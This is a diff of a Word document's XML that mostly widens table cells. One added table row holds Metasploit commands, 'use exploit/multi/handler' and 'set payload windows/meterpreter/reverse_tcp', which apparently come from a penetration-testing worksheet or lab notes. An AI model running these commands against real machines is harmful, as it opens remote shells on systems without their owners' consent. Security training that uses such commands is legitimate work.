-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -1656,29 +1656,29 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -1694,29 +1694,29 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -1750,7 +1750,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -1850,21 +1850,21 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9576" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
@@ -1886,7 +1886,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -1902,7 +1902,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2005,21 +2005,21 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9576" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
@@ -2041,7 +2041,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2057,29 +2057,29 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9576" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
@@ -2107,7 +2107,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2129,7 +2129,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2153,7 +2153,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2163,7 +2163,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2175,21 +2175,21 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2202,7 +2202,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2217,21 +2217,21 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9576" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
@@ -2253,7 +2253,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2299,7 +2299,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2314,21 +2314,21 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9576" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
@@ -2350,7 +2350,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2360,99 +2360,99 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9576" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
@@ -2474,7 +2474,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2489,7 +2489,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2518,7 +2518,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:tcW w:w="9576" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
@@ -2563,7 +2563,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:tcW w:w="9576" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
@@ -2580,7 +2580,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2609,7 +2609,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2621,7 +2621,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2631,7 +2631,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2643,13 +2643,13 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
             <w:vMerge w:val="restart"/>
           </w:tcPr>
           <w:p>
@@ -2791,13 +2791,13 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
             <w:vMerge/>
           </w:tcPr>
           <w:p/>
@@ -2806,13 +2806,13 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
             <w:vMerge/>
           </w:tcPr>
           <w:p/>
@@ -2821,7 +2821,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2831,15 +2831,15 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2899,7 +2899,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -2983,7 +2983,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3121,7 +3121,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3274,67 +3274,79 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Use exploit/multi/handler</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>CL: set payload windows/meterpreter/reverse_tcp</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9576" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9576" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
             <w:r>
@@ -3349,7 +3361,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -3360,15 +3372,15 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9576" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
@@ -3393,7 +3405,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -3414,15 +3426,15 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9576" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
@@ -3444,21 +3456,21 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9576" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
@@ -3477,7 +3489,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:tcW w:w="9576" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
@@ -3490,7 +3502,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3717,7 +3729,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -3762,41 +3774,41 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
